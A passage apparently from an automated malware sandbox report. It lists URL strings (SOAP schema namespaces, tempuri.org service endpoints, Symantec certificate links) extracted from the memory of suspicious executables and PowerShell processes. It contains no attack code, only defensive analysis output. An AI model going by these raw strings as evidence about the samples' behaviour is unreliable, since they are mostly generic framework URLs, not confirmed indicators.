                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2524411157.000002E535F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.00000219909D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                              Source: powershell.exe, 0000001F.00000002.2524411157.000002E536162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
